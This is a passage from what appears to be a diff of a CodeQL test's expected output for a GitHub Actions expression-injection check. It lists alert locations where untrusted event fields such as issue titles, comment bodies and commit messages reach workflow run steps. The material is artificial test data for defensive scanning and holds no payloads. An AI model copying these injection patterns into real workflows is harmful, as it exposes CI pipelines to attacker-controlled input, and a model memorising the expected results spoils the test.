.github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | 
github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| 
.github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... 
test }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... 
ion }}' | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... 
title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... 
tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... 
env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... 
ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... 
bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... 
tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... 
ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... 
ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... 
tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. 
| -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. 
